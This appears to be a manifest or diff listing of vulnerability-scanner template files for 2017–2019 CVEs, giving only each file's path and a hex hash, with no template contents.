-http/cves/2017/CVE-2017-7615.yaml:1ba8f02d56144515305328ef82f0650d4ffd2ab4 -http/cves/2017/CVE-2017-7921.yaml:1b44dba0e85615cbc05aaf703305f2d786629d7c -http/cves/2017/CVE-2017-7925.yaml:0ba6378de04152b606ca9a9eb0cdfbbbb7a83809 -http/cves/2017/CVE-2017-8229.yaml:e26fa12c74207b996faf11aad175d1ed7b265425 -http/cves/2017/CVE-2017-8917.yaml:33ca4dd4ac335b5882a69cc282cfa43e44338e43 -http/cves/2017/CVE-2017-9140.yaml:7d21305d0561300f3003494add2d89cc517c8c3f -http/cves/2017/CVE-2017-9288.yaml:e412046a27de9d1083a1c64a01b23d051c09d336 -http/cves/2017/CVE-2017-9416.yaml:537356e8f96feca7d8970ca43e334733e7b7d95f -http/cves/2017/CVE-2017-9506.yaml:e6242c0947de9fc53a17f71f8ff2bd5684b13ced -http/cves/2017/CVE-2017-9791.yaml:dc14bd5c3e0946891aaaf767d700062b1e93c2c0 -http/cves/2017/CVE-2017-9805.yaml:5ff39404cbbdf8baaa29566c72c85f3d2725719b -http/cves/2017/CVE-2017-9822.yaml:847d45a7a9e05fdfb069c9f7ae5f34479d997be0 -http/cves/2017/CVE-2017-9833.yaml:0e7536d49064c392ddd7ce97e25ab8bef769e375 -http/cves/2017/CVE-2017-9841.yaml:09a58df3dfa1ea74d4267a119f9fb28ea945901a -http/cves/2018/CVE-2018-0127.yaml:ac0edda9d31e4404b46448f7cc5020e2d35ef87f -http/cves/2018/CVE-2018-0296.yaml:2ff1b12425f9977079e4c8341a960c6b6d5ea271 -http/cves/2018/CVE-2018-1000129.yaml:02331b43523d5870bbcc4dd1b3dabc81a2e82a60 -http/cves/2018/CVE-2018-1000130.yaml:52296a072a48a50c12a1af7b90d0546c7031f24a -http/cves/2018/CVE-2018-1000226.yaml:275b35a669479f65c7fb4abb219271533b67d7ef -http/cves/2018/CVE-2018-1000533.yaml:4f018bfff5e7659bb9a62f9c4d404eb068791930 -http/cves/2018/CVE-2018-1000600.yaml:6aec257dc53dd1cf2161221f08b931894fc7fad1 -http/cves/2018/CVE-2018-1000671.yaml:0ee1244c39e8b15386dcc315d886891b133a2e43 -http/cves/2018/CVE-2018-1000856.yaml:c9b553f560be7662078247cee32b6988d4e5671b -http/cves/2018/CVE-2018-1000861.yaml:91b8335875ed042fadc39234e9d4a385f9548a1c -http/cves/2018/CVE-2018-10093.yaml:cd11a95522bd3bb0931bbb75c11e6957f723569a -http/cves/2018/CVE-2018-10095.yaml:4737d1ed4ed714484d504ff389cb3d0ce743ef10 -http/cves/2018/CVE-2018-10141.yaml:7151b86fb0fd8557e10926aa5f5646f3179f5053 -http/cves/2018/CVE-2018-10201.yaml:839507da39f73d09eb4ea67836c86b2b32f0c50e -http/cves/2018/CVE-2018-10230.yaml:04bf865c66af294104c0f9f05f399401a364be3d -http/cves/2018/CVE-2018-10562.yaml:9381c58fb2d87dc5159c35ce922045c78d0aa471 -http/cves/2018/CVE-2018-10818.yaml:34f57c8fb6fcafafbbc397d63c92e3565d96c1dc -http/cves/2018/CVE-2018-10822.yaml:2fb450cccae46f4d618d5d69221506610d18a8c5 -http/cves/2018/CVE-2018-10823.yaml:dff541628767210782862f37bfaca4fed4e0787e -http/cves/2018/CVE-2018-10956.yaml:e6de701b1236249bb05028b74de742c2e1134000 -http/cves/2018/CVE-2018-11227.yaml:265abda90f14fe653a63a8331cca48944fdbea73 -http/cves/2018/CVE-2018-11231.yaml:90db21bce4401b866754c37a71c6e004e3fcc26b -http/cves/2018/CVE-2018-11409.yaml:13bf095e4a487acd67885ebbedad73114f9c1b2b -http/cves/2018/CVE-2018-11473.yaml:cb1d2265d46fa2ddf2eb8aeb0b38ec03dcdfde74 -http/cves/2018/CVE-2018-11709.yaml:e0e4c48cfdd86c7acd04eafc3b38819ff3600f43 -http/cves/2018/CVE-2018-11759.yaml:ed21d04b36489502eaf2bc4f904af804d0daee80 -http/cves/2018/CVE-2018-11776.yaml:6c9553bbd8701c848278e91d4db08efebde32f88 -http/cves/2018/CVE-2018-11784.yaml:4a4ea9806adeb1f9f8c9913c4d0dba0872cd93f5 -http/cves/2018/CVE-2018-12031.yaml:70cbdc081fc0b0b7060db2ba4e9a9b1e50f34252 -http/cves/2018/CVE-2018-12054.yaml:a34fc98da21eeb40386f3887beaf5d227baf995c -http/cves/2018/CVE-2018-1207.yaml:4baa969da84ae7f6140e472333337c03a6c677f9 -http/cves/2018/CVE-2018-12095.yaml:427fdcb2619372156a944000e94dac4227b50ceb -http/cves/2018/CVE-2018-12296.yaml:9fa14b5a23aa6986965003faf59493996c43dec6 -http/cves/2018/CVE-2018-12300.yaml:d1bd20fd64436bed9338477214e4742c4b3af079 -http/cves/2018/CVE-2018-12613.yaml:ffdcb74d3bc3acbc2ef3c24277d48ec1c0be8467 -http/cves/2018/CVE-2018-12634.yaml:efafd7e8f7d7c39a8d96116eef2d412f51b6db3d -http/cves/2018/CVE-2018-12675.yaml:61b6e804e73e79e398ce99da7e67e7383023c5a7 -http/cves/2018/CVE-2018-1271.yaml:8c2c93165a2c71dd6c0932e7ce51bf08d3f19af1 -http/cves/2018/CVE-2018-1273.yaml:d875dba8b4cb52a45367b874895c2779f057d852 -http/cves/2018/CVE-2018-12909.yaml:66c0211b17cddc0827d46cd4c9e659f38ca95d89 -http/cves/2018/CVE-2018-12998.yaml:f486f3566a9c80c94ea4cdff120c9b5c1c0e73f2 -http/cves/2018/CVE-2018-1335.yaml:a468435d8d2abbdb04b2cdae630526b8a116a0f0 -http/cves/2018/CVE-2018-13379.yaml:521ec93923d1b5ead633ccc310407404b1fe2f77 -http/cves/2018/CVE-2018-13380.yaml:666c6d2c396dc70647516c1fc11be9d48727cdc3 -http/cves/2018/CVE-2018-13980.yaml:a5b647bb7232bbd827bb263e46670ba0822d3191 -http/cves/2018/CVE-2018-14013.yaml:a0befebb274ca6db77f7e60447bd23217ef244c4 -http/cves/2018/CVE-2018-14064.yaml:9b369cd29a508a4e9a1b89d07ebf727848bd5905 -http/cves/2018/CVE-2018-14474.yaml:650b026342ec33de6ec0cf998f015b57837dc806 -http/cves/2018/CVE-2018-14574.yaml:682f8b57fa5e18e1d6422fbf91aee6f6d1c101d8 -http/cves/2018/CVE-2018-14728.yaml:d0c32ef7e182e10df2c2a036ff1859edb1532c11 -http/cves/2018/CVE-2018-14912.yaml:cfdfdf9915cf07f17248311390c2f76b3496e797 -http/cves/2018/CVE-2018-14916.yaml:3979dff6178f47900e20a6296bf353de270c2390 -http/cves/2018/CVE-2018-14918.yaml:238e579eacfd6dc6fe9a8aec071457e0f2aea775 -http/cves/2018/CVE-2018-14931.yaml:6c1370722086cf55a9a9a9d7bf5fbf7b9f8f7a25 -http/cves/2018/CVE-2018-15138.yaml:e8397ad3b361d7623851bdae734337511563d752 -http/cves/2018/CVE-2018-15517.yaml:97a60e9ba8c49555ecdc1de326646bdce379367c -http/cves/2018/CVE-2018-15535.yaml:a3ab48b0e9b34831912bd65fcdc1769cc1bb788a -http/cves/2018/CVE-2018-15745.yaml:88dca74464f134a517725f215c56e64df369f9b6 -http/cves/2018/CVE-2018-15917.yaml:ea9408feec6802710f83f0e55caeec4aa7652fb9 -http/cves/2018/CVE-2018-15961.yaml:4a84833aa476628690afaa6e8393778c7b1fa7e1 -http/cves/2018/CVE-2018-16059.yaml:2bc83e07170dc9ea77ff059674df7f5a4e1a54f7 -http/cves/2018/CVE-2018-16133.yaml:88fde344639d339c2eef187fbeb6427493c17c2f -http/cves/2018/CVE-2018-16139.yaml:edfb32f379852a46995214ecbe606db953e3c272 -http/cves/2018/CVE-2018-16159.yaml:92088d2928712d69ec2bf21fc0323c858a8de5eb -http/cves/2018/CVE-2018-16167.yaml:b7f024073ad4d46e1f19de0ce2353149d1036bc2 -http/cves/2018/CVE-2018-16283.yaml:e3f3cbb782a4b4058da8ba4fea1ec0871f900e2d -http/cves/2018/CVE-2018-16288.yaml:eec8720c15d4e44f7f41f3982f269f4594be2142 -http/cves/2018/CVE-2018-16299.yaml:b123ccec90a4b1590c184b9ffc8adc87e4cc60b1 -http/cves/2018/CVE-2018-16341.yaml:299c6762dd858a156164ae823dab54b900fb9ebd -http/cves/2018/CVE-2018-16668.yaml:fb679b93948dbb3ac150e1637565403ac6be87cb -http/cves/2018/CVE-2018-16670.yaml:870b35fc91f13076fe0a3517a31b09c67eb0b28c -http/cves/2018/CVE-2018-16671.yaml:a8a1cc348d88ac47eb3fc4616b3a98135fa63f9f -http/cves/2018/CVE-2018-16716.yaml:665d29762c3315e038a0e8e871adcf412330635b -http/cves/2018/CVE-2018-16761.yaml:671bec1c70162ca554ee907e8e363d4a190869b8 -http/cves/2018/CVE-2018-16763.yaml:c70554b96810080b8836733cdad235fe599bd8c8 -http/cves/2018/CVE-2018-16836.yaml:756dfb1362f332c600a00797f22d4d1bc721c918 -http/cves/2018/CVE-2018-16979.yaml:b6de9ceda596f39e96f4145c9f3c02014ff47a87 -http/cves/2018/CVE-2018-17153.yaml:e199ab39ec71cc03f2e14301499fc965090b7e30 -http/cves/2018/CVE-2018-17246.yaml:d955be6d54349854227318d931a718abe45ed467 -http/cves/2018/CVE-2018-17254.yaml:e6cdd19ac7b4ffd6a878dd468afa1ba78cfb2df8 -http/cves/2018/CVE-2018-17422.yaml:52ba1af80e2a3702abaa2ed58b9342095bc5b910 -http/cves/2018/CVE-2018-17431.yaml:4a01420de80ad273ae14770d6bd1d0132f95e008 -http/cves/2018/CVE-2018-18069.yaml:09340f80af14c3f8302a50abfb9af172b962030e -http/cves/2018/CVE-2018-18264.yaml:49c65d6227ebd7071fcaddcd7724794c7e78fa64 -http/cves/2018/CVE-2018-18323.yaml:ac14aa972a78fa6f4940ed75ebf096ea76b3de84 -http/cves/2018/CVE-2018-18570.yaml:1facca4d6ecf83720127bad89c97c9c92f692120 -http/cves/2018/CVE-2018-18608.yaml:a43826a2c67c86fef6e41e62fe103f1ec444b03b -http/cves/2018/CVE-2018-18775.yaml:ed918d6dcba496a595d78714c38c0ac9cc80ddd5 -http/cves/2018/CVE-2018-18777.yaml:7d9ab1681824ea4c53e6e4b0723a2da0bc1f2e58 -http/cves/2018/CVE-2018-18778.yaml:d37d3a10fd7ba59318e5e05c814d78db62642c50 -http/cves/2018/CVE-2018-18809.yaml:7c30cc9b68b112a888500d588095b56634ed9cb9 -http/cves/2018/CVE-2018-18925.yaml:4e8ee8966de6e6e9d0fe0c814271d577cb157223 -http/cves/2018/CVE-2018-19136.yaml:e75cdbfcca0f5ae2a000a1fa0080d775d2262fd3 -http/cves/2018/CVE-2018-19137.yaml:5b100af5704dafd4e03d7fb65ba9b3f4ec50c306 -http/cves/2018/CVE-2018-19287.yaml:b93f6ec2234afcbb05c599db5b196e50977bb705 -http/cves/2018/CVE-2018-19326.yaml:f831e594bea7ccaa46a0ebde5a12d48a6938c3b6 -http/cves/2018/CVE-2018-19365.yaml:6accb98b8650fb627be9fb9cbfad773b80eee4b1 -http/cves/2018/CVE-2018-19386.yaml:e56dd8dae85a2c40dd5d45854b3b80d69a4a211c -http/cves/2018/CVE-2018-19439.yaml:e385fa4321448ac876f269f6c6014d305c06e7e1 -http/cves/2018/CVE-2018-19458.yaml:cc24560a3157616a99d70b330413f4300d79eebd -http/cves/2018/CVE-2018-19749.yaml:c6d89ddb03a4ac1a78d648c493f58263bd9388f0 -http/cves/2018/CVE-2018-19751.yaml:83dc60b2b853392945d30d6685465afdf9ab81ee -http/cves/2018/CVE-2018-19752.yaml:6cf5dd9aaa321b87ac8f71742836cf8e52919a31 -http/cves/2018/CVE-2018-19753.yaml:662cb56a05b770ab6a1bf7e5e7240baef3a09572 -http/cves/2018/CVE-2018-19877.yaml:818bf7851b65f8206f75dfedb4178727dfeb9dd2 -http/cves/2018/CVE-2018-19892.yaml:7a77a940c75e9688c95fde27591b2cae369df74f -http/cves/2018/CVE-2018-19914.yaml:02f07e98f5b3ba1511e38f254495533299485e59 -http/cves/2018/CVE-2018-19915.yaml:3331c71394b4a37cf8e53472a477f1c573957a38 -http/cves/2018/CVE-2018-20009.yaml:caa8acc5cbe2ba6d748110dccbf67e221653ad03 -http/cves/2018/CVE-2018-20010.yaml:79f89a63fca5e796f5d2a2ed6b1f523b2f255a14 -http/cves/2018/CVE-2018-20011.yaml:96153c92750fbf6fda468d4adfc70f1c2e788fdb -http/cves/2018/CVE-2018-20462.yaml:e2702678367f227ac05c0faf3430e900ff555da3 -http/cves/2018/CVE-2018-20463.yaml:9d6b4cce843cc3e437856dc7565c2112ee149303 -http/cves/2018/CVE-2018-20470.yaml:a1d0746f936a86f356de213bd34148b652ce886d -http/cves/2018/CVE-2018-20526.yaml:10f2bd5f8946e3831edcc9f07cdf7b0299ccbe65 -http/cves/2018/CVE-2018-20608.yaml:31e3eb3f44e710c001bb77cf6b41ab63f3000e65 -http/cves/2018/CVE-2018-20824.yaml:f969f397573aef2485c85d66bf538a7c90a80ef4 -http/cves/2018/CVE-2018-20985.yaml:ab91fb122bd3813d4d61c8e9cdb33a03d2bea75e -http/cves/2018/CVE-2018-2392.yaml:7843d74a7adaa279ab15fe4fef7badd4bde9e8c8 -http/cves/2018/CVE-2018-2791.yaml:5d4ca759f8e353f71b15f5ce42c14ad831a75217 -http/cves/2018/CVE-2018-2894.yaml:9d9ae28e1742ccdff94a5a1b88dd73a8b5156ae6 -http/cves/2018/CVE-2018-3167.yaml:e8cdbe8a8fc433ed64dd36bcdd00c8153bc5b71e -http/cves/2018/CVE-2018-3238.yaml:304ff64ec2a4d67071f0335c2e8956c8d833fa5a -http/cves/2018/CVE-2018-3714.yaml:8fd90da83ebba2d8bef27a0199a32f6ca35d043d -http/cves/2018/CVE-2018-3760.yaml:8dc19c7c137333ce1488e104c5fb8af9bf59490c -http/cves/2018/CVE-2018-3810.yaml:5d937eaa9404646e4ccde908fe4a0b9d4ddb672a -http/cves/2018/CVE-2018-5230.yaml:44324213671e8baa31a034808587b36c5376ae6a -http/cves/2018/CVE-2018-5233.yaml:da18cd3e424ddefcec6ed8e006481358a040c1fc -http/cves/2018/CVE-2018-5316.yaml:c98fb8b80335480ded8e8f6f72602cb5b57723d3 -http/cves/2018/CVE-2018-5715.yaml:07a9ce06f91be2127e16106bc291d6ca8a7a9ff5 -http/cves/2018/CVE-2018-6008.yaml:ef3b0235982c72a51f538e339f0438466a92235f -http/cves/2018/CVE-2018-6184.yaml:d05c7df179e4a6baa929f1ad3755b33e611e7403 -http/cves/2018/CVE-2018-6200.yaml:82a383e97297b1608358ca5b6a8dab0685f84bd8 -http/cves/2018/CVE-2018-6530.yaml:b14a2fff4b0cafde0e7190292343d63663a33fab -http/cves/2018/CVE-2018-6910.yaml:f7acba4781bdcf6b7dad66a0a52c02d7ea560162 -http/cves/2018/CVE-2018-7251.yaml:8f47f9381c725928706f7b484916d0c7ec95cb7e -http/cves/2018/CVE-2018-7422.yaml:ff4e477ff80e9221f970782dcfc93f0c97343bca -http/cves/2018/CVE-2018-7467.yaml:eb629ea7f5137400319dc0f7b417387e5c7482b4 -http/cves/2018/CVE-2018-7490.yaml:41eb335a51029c3cf671f324c7bc2f1a3c343d71 -http/cves/2018/CVE-2018-7600.yaml:f5ad649f2ddbf8148b5b5aa42685674da353a478 -http/cves/2018/CVE-2018-7602.yaml:b597b04c8d622f13eaebfabed71f0251af493809 -http/cves/2018/CVE-2018-7653.yaml:7e50cb9e229730ad91f097129d33ed8ed01857a1 -http/cves/2018/CVE-2018-7662.yaml:35c3fc1bf35b6b7d06cfadb10980e78a69f7b9a3 -http/cves/2018/CVE-2018-7700.yaml:545cf5f180ab1521fa2099a2b8070fc0e7cfd589 -http/cves/2018/CVE-2018-7719.yaml:24b8824dc83fe53074ff37d4d701dbb37fa8fa8a -http/cves/2018/CVE-2018-8006.yaml:177090eae649f97b8542cdd31283d5bb9c159daf -http/cves/2018/CVE-2018-8033.yaml:47b4553a7e9a3299a274a2c9d886f7f48bbb34bf -http/cves/2018/CVE-2018-8715.yaml:c060e110534181e713e4929f18a5372aab6de204 -http/cves/2018/CVE-2018-8719.yaml:69991b72cd92b3bcf3fc41456d4b8a8430044ed1 -http/cves/2018/CVE-2018-8727.yaml:d77bc3899ccb7e4180c0570612f49c0306e77cac -http/cves/2018/CVE-2018-8770.yaml:60e87cd61d39c08de32877a3bd3eea3efd201d82 -http/cves/2018/CVE-2018-9118.yaml:5a3ec3d29d1e2155e4c1c8e57ae183fdba239bd6 -http/cves/2018/CVE-2018-9161.yaml:cac8cbda295e8b33fabdee0e6012fd10af943c94 -http/cves/2018/CVE-2018-9205.yaml:88e7f9e1b4b143736af6e06e6bd0d5d7e329c1ea -http/cves/2018/CVE-2018-9845.yaml:625a726a679a8c47c1f041908720da694347ddd3 -http/cves/2018/CVE-2018-9995.yaml:595c0f1f58073444608d96aab75a2c3273c832f0 -http/cves/2019/CVE-2019-0193.yaml:bdd7020875f2534cc54cbf05fad0506d201d5417 -http/cves/2019/CVE-2019-0221.yaml:9892d1794c813e0b65b8ea300ad030e035f34afb -http/cves/2019/CVE-2019-0230.yaml:fb813d846646372f831d22ef14c127bb366d6f1b -http/cves/2019/CVE-2019-10068.yaml:df48b4fbe3f1d7d1964c8748c946dd39f3fb18df -http/cves/2019/CVE-2019-10092.yaml:47c8cf9c84f55150405be3eeb85c04735c2f689b -http/cves/2019/CVE-2019-10098.yaml:03c48a816abcb2bd95cb82833b96203f5b749045 -http/cves/2019/CVE-2019-1010287.yaml:ee0d16aa0e682261a4fab71f7a9db6cb63432cee -http/cves/2019/CVE-2019-1010290.yaml:de37c24f872bac7f162a759b7070dd36bef8921c -http/cves/2019/CVE-2019-10232.yaml:583f7625a2225f16fdfa808e08cce94aace549b1 -http/cves/2019/CVE-2019-10405.yaml:fb207522d7ce92ed741fb12820f34870e0a9dca7 -http/cves/2019/CVE-2019-10475.yaml:ac4ac26a966afa7f749a36abfcd9b382809d2b6c -http/cves/2019/CVE-2019-10692.yaml:25f77807fa261cac2c6042cf881c286bb8b92a66 -http/cves/2019/CVE-2019-10717.yaml:8207ae4d46379e3b54693ebbaa2d844e2771d276 -http/cves/2019/CVE-2019-10758.yaml:d50b172e0ddded831a7c82d63cead3a2bea5503e -http/cves/2019/CVE-2019-11013.yaml:7366a212d9a1754e91010ff5f85c343059edc9d7 -http/cves/2019/CVE-2019-11248.yaml:17b65cc75baa9db48c8890da4d0d6b26ea0a303e -http/cves/2019/CVE-2019-11370.yaml:1595e81fe1302238e581ff5a0344f98bc447a90d -http/cves/2019/CVE-2019-11510.yaml:e40506f727b6461d1f669bc6a516fc6008eeff20 -http/cves/2019/CVE-2019-11580.yaml:2d75acbce2c34b66fc36c09a587451338da47a37 -http/cves/2019/CVE-2019-11581.yaml:d3dff6113063409b50a4d1dafc6509e1d54491bc -http/cves/2019/CVE-2019-11869.yaml:f817212310482f8e070391f63701c3fde5cc5ef3 -http/cves/2019/CVE-2019-12276.yaml:27f893f7a856e8a4a18ad436113c1c97fb398db6 -http/cves/2019/CVE-2019-12314.yaml:0099565ef982560f6b9e7586810cd921c85db3b2 -http/cves/2019/CVE-2019-12461.yaml:b5e2478f0a2be49ade9c408f0baa2758f9d3e510 -http/cves/2019/CVE-2019-12581.yaml:66d80a98eec1301f060eb95851b2aea98877a817 -http/cves/2019/CVE-2019-12583.yaml:f3bc9e07a0b11be50e42d3a4027f914b0b190560 -http/cves/2019/CVE-2019-12593.yaml:e7eacdfcebd3448a295248f4dd664b6c65025594 -http/cves/2019/CVE-2019-12616.yaml:c5ee3879fbc8c2ecb4f291744b61a812181157ff -http/cves/2019/CVE-2019-12725.yaml:b0dab9fedf14c989116c6dbc19b1070fda98f69c -http/cves/2019/CVE-2019-12962.yaml:c9c29a61d8f667c117f9936106a98e0d7687b602 -http/cves/2019/CVE-2019-12985.yaml:7a1442fdc5df63a6c6ec075677d30d0475b7be05 -http/cves/2019/CVE-2019-12986.yaml:8b796581180f6dc9a9f93e3c5c406bdaac4bb75a -http/cves/2019/CVE-2019-12987.yaml:be2e716ad6d96d0ad6a70de64587c508082daf95 -http/cves/2019/CVE-2019-12988.yaml:17b6b229e80ba09ba192d2955cbd760b95bdc434 -http/cves/2019/CVE-2019-12990.yaml:a9e017ee3b6dd00043a8c87de85b051e4d57121c -http/cves/2019/CVE-2019-13101.yaml:605fc575cc61a9af3f8d41ad1ffb119ccca7eb5a -http/cves/2019/CVE-2019-13392.yaml:41809bacedc52f6d989a66aa1a2291e11c6d2de0 -http/cves/2019/CVE-2019-13396.yaml:53f9ac256f8634234deb5ddbc87c3e21369204df -http/cves/2019/CVE-2019-13462.yaml:a27119733cfc6a56487b1981f2a301a20c3c1daf -http/cves/2019/CVE-2019-14205.yaml:724650ac9f61b4b569ecc43e01dfd413706392eb -http/cves/2019/CVE-2019-14223.yaml:13e482ad2c8c67f64e0d0191c3ed9ccb2d6dd0b3 -http/cves/2019/CVE-2019-14251.yaml:5a7c55ffd72242316f4e23510c6149ed7bcc49d8 -http/cves/2019/CVE-2019-14312.yaml:69cf9d348b788a1273f3886a02b899fad7593129 -http/cves/2019/CVE-2019-14322.yaml:6bf48685f1d22abcad5d83300ef8733f4b6abd79 -http/cves/2019/CVE-2019-14470.yaml:124de5d2583d8918ad72484f53b876c7b9ff1cb1 -http/cves/2019/CVE-2019-14530.yaml:1d42b890613650b412b577c26bac8f1f39c013a1 -http/cves/2019/CVE-2019-14696.yaml:2b634782e60548c905a3d8ea36d3d2d50db8e489 -http/cves/2019/CVE-2019-14750.yaml:5f960226018c61d39a29ff172fa5e099bd67b8e0 -http/cves/2019/CVE-2019-14789.yaml:a23a97b9f793063529c5e81ecef45f9565f994f3 -http/cves/2019/CVE-2019-14974.yaml:86fcf54559b1773a51611f6b6920a0c348b83b46 -http/cves/2019/CVE-2019-15043.yaml:493d5324e4b85a5d8ec19809b2ccd754559bf6fb -http/cves/2019/CVE-2019-15107.yaml:b3199503dbeed98c1f9b965679753f68918a86de -http/cves/2019/CVE-2019-15501.yaml:045a5c0b79162309ef51ca7fa662b2263aceab76 -http/cves/2019/CVE-2019-15642.yaml:6665db40b0a2e3d837ef0c09bbd3095cdfff5aea -http/cves/2019/CVE-2019-15713.yaml:42feab6aa07cad0b58db902d6193d625d740fdd4 -http/cves/2019/CVE-2019-15811.yaml:3995ef0073ee795862868a08f985d5ebbf97e40a -http/cves/2019/CVE-2019-15858.yaml:1bc7c733bd1160a1e72aff73718147bc1a9444fb -http/cves/2019/CVE-2019-15859.yaml:3f4a81780513155a77b07667007b287fdcca8c0c -http/cves/2019/CVE-2019-15889.yaml:be3f1a0481473955dd94c78647bd139e35456c51 -http/cves/2019/CVE-2019-16057.yaml:40f6ae09369ff7c2a8e8cd45321cb91ca1d554b3 -http/cves/2019/CVE-2019-16097.yaml:e5de9cacac9bb877473e2b9190f1c34d028eaacb -http/cves/2019/CVE-2019-16123.yaml:72c8040226ee8ad83270d80b1684bf0094a329ac -http/cves/2019/CVE-2019-16278.yaml:20a792baf38dc2feefa2f8196aa35848c3b24b67 -http/cves/2019/CVE-2019-16313.yaml:b872dbddb08b5dc50d686b0ca511c879682c17a8 -http/cves/2019/CVE-2019-16332.yaml:06ef4a304939a22609ac294d66c5bf7f6ccd79e4 -http/cves/2019/CVE-2019-16525.yaml:509c4ac67ba3ee99c55fa37dda08f3713652dc05 -http/cves/2019/CVE-2019-1653.yaml:150ae32e0b8be9b98b391ca2a0e12d9e0f67c12e -http/cves/2019/CVE-2019-16662.yaml:823a90f18963e2019a4950f1f2fb51671b87bfde -http/cves/2019/CVE-2019-16759.yaml:5470b0309cd88a38e05159b2f0a9ed546c9da23d -http/cves/2019/CVE-2019-16920.yaml:a0d1bf9da72ba7147594e9e74704358e8bbe94f4 -http/cves/2019/CVE-2019-16931.yaml:eac9c2c00b1b5cf2609230eb076a97d52141e9ae -http/cves/2019/CVE-2019-16932.yaml:cbb21f7877dc7205746f13cbc3a4d81048fdc5b7 -http/cves/2019/CVE-2019-16996.yaml:927bb7dfb3eeb583c963a59a7371e9121194219c -http/cves/2019/CVE-2019-16997.yaml:b8244f8546b7ece08f535f6716d2028343235f06 -http/cves/2019/CVE-2019-17270.yaml:9764921d36c52fb01e7a755b284d3b89f60f28fc -http/cves/2019/CVE-2019-17382.yaml:1964e9e8231d0fc86936f2fe167293148ec1da75 -http/cves/2019/CVE-2019-17418.yaml:bc03d6ad26c72cea4dd21359dee99c2be3820b9a -http/cves/2019/CVE-2019-17444.yaml:e8ef723acb2b0e90e1aeb2ed194c35a42c6e4e3d -http/cves/2019/CVE-2019-17503.yaml:da182187ffcd7d17e82e61f1d89453b110160df2 -http/cves/2019/CVE-2019-17506.yaml:6c616e9302978285c2657c49de59296d28e3f6c8 -http/cves/2019/CVE-2019-17538.yaml:f40fe589fb014bd3f245210c1c6107f1ce38c5c3 -http/cves/2019/CVE-2019-17558.yaml:bcd00e85479df46d9064c5c43064bb71bd74c47b -http/cves/2019/CVE-2019-17574.yaml:b7abb430f1a4649ee0e69ed038b1db9bbab29f7d -http/cves/2019/CVE-2019-17662.yaml:7e12f0e06edfea8901c3da05f166458bf35211f0 -http/cves/2019/CVE-2019-1821.yaml:596b768ecc84688eb5ace542d0675e483de685f9 -http/cves/2019/CVE-2019-18371.yaml:73213e9b92ab1dc7e20811c89df41827409f03f1 -http/cves/2019/CVE-2019-18393.yaml:f7a0a6bedb32d116dd692a86c783d1aa1af627ba -http/cves/2019/CVE-2019-18394.yaml:b0e343e331638776b25f1786511a696ab07d893c -http/cves/2019/CVE-2019-18665.yaml:6e0092368746d830b43afc6bc3d8b7019fda900c -http/cves/2019/CVE-2019-18818.yaml:c06314d784ca66fb35024a71b0b8fb3836183111 -http/cves/2019/CVE-2019-18922.yaml:a52c6e510f1eb7a5dd908ab353bd6b3a458143f6 -http/cves/2019/CVE-2019-18957.yaml:9293ea5317dfeaa3187cd14c96db11d6f91cda69 -http/cves/2019/CVE-2019-1898.yaml:bdf566ac59ca7aee29e30a470db6767d580d0f0a -http/cves/2019/CVE-2019-19134.yaml:d724eda9d09ee65372af71ca6fa4152f4edb321c -http/cves/2019/CVE-2019-19368.yaml:64f175189cb26bf4cb2d99aa6a4719efce9ca294 -http/cves/2019/CVE-2019-1943.yaml:3a04f0b5f26ee3a0f489c62ceed6f9238cdfd6cf -http/cves/2019/CVE-2019-19781.yaml:5c3bba7cacb1ef642d1325c259760e2e757c39ee -http/cves/2019/CVE-2019-19824.yaml:cd804f5f04cb2537837adc965a9b4792652b8462 -http/cves/2019/CVE-2019-19908.yaml:c68067562c2662157e87172f4d20ddd2c8ca4d85 -http/cves/2019/CVE-2019-19985.yaml:2ae8a50cfb2029b002760745b95add22689b7e98 -http/cves/2019/CVE-2019-20085.yaml:835d411cff3720d32f57ed29223e9986678de041 -http/cves/2019/CVE-2019-20141.yaml:fb41ecf88cd78d4449f8ae129ca8f965b68da75e -http/cves/2019/CVE-2019-20183.yaml:87ee3fc26256ae200eefd46f8294afe40135db48 -http/cves/2019/CVE-2019-20210.yaml:5dc29136575d12bf698066f767198af46daac61e -http/cves/2019/CVE-2019-20224.yaml:6e3e38499c47bee9ceb75c00b4c14d5aa7bf906b -http/cves/2019/CVE-2019-20933.yaml:77a7cd0a770f43977e7d28444893b218017db550 -http/cves/2019/CVE-2019-2578.yaml:7a0917a1b036d8f13e85e155d0efde94a957fe4a -http/cves/2019/CVE-2019-2579.yaml:d9a5cb29714cb148919a56e8fd1e451dbcc98ef3 -http/cves/2019/CVE-2019-2588.yaml:f9b9f79b2332b94f0558a4edd1cdc5e8dec032d8 -http/cves/2019/CVE-2019-2616.yaml:fdd8f9f4cdc93a7181b4573305846de753542b4b -http/cves/2019/CVE-2019-2725.yaml:bc19fd7004d821edb684bc1b263765b5340c09b5 -http/cves/2019/CVE-2019-2729.yaml:130b1edbd12d2a624d5efb49bae906871f09bac2 -http/cves/2019/CVE-2019-2767.yaml:2b157a3be04ed461fd977920d93a7c5089a82bfa -http/cves/2019/CVE-2019-3396.yaml:58365c6732be8bf19188afd0274dd824b21ae565 -http/cves/2019/CVE-2019-3398.yaml:49e8f9786b6c0c0c9cb4a6dec68e6e986dbbf21d -http/cves/2019/CVE-2019-3401.yaml:fa26d39bc617980dd717ff8b8e87bb7165572fd1 -http/cves/2019/CVE-2019-3402.yaml:ceedd40c6947534bce1aca68808c879b426da902 -http/cves/2019/CVE-2019-3403.yaml:49ad9981cb2fcdd5497e0a12404869e09644cc92 -http/cves/2019/CVE-2019-3799.yaml:a7f65ec87a3633e9f3b6bb6671db1dd103536e39 -http/cves/2019/CVE-2019-3911.yaml:f89542046ded30793ed7fe46aa839e9e1d6ab79e -http/cves/2019/CVE-2019-3912.yaml:94799d73e7dee6145c94b4e9a67e5210e1b8930e -http/cves/2019/CVE-2019-3929.yaml:62a56d3ad1b44d5a4dfdfa14eb5357dce1a524ee -http/cves/2019/CVE-2019-5127.yaml:983e90c29d2ad650b38a404c2504df2cc0b52ea8 -http/cves/2019/CVE-2019-5418.yaml:0a26ee3ec5342ed717ce590832124b064d9c3fad -http/cves/2019/CVE-2019-5434.yaml:88f10696e1d71e89bcc265351ae9007bc6da434d -http/cves/2019/CVE-2019-6112.yaml:96865686f80b685912e8599885c75230f9c2a4b2 -http/cves/2019/CVE-2019-6340.yaml:eb0516c10b4c8966f779929ac85b960ce217d294 -http/cves/2019/CVE-2019-6715.yaml:c981164ee863fe37f70feee7b3bdac9872aa113a -http/cves/2019/CVE-2019-6799.yaml:aefdd4c0f9ccd5b2fb19757e534ad01d892c65de -http/cves/2019/CVE-2019-6802.yaml:c552341cd86965352c720526d3680472f098f76f 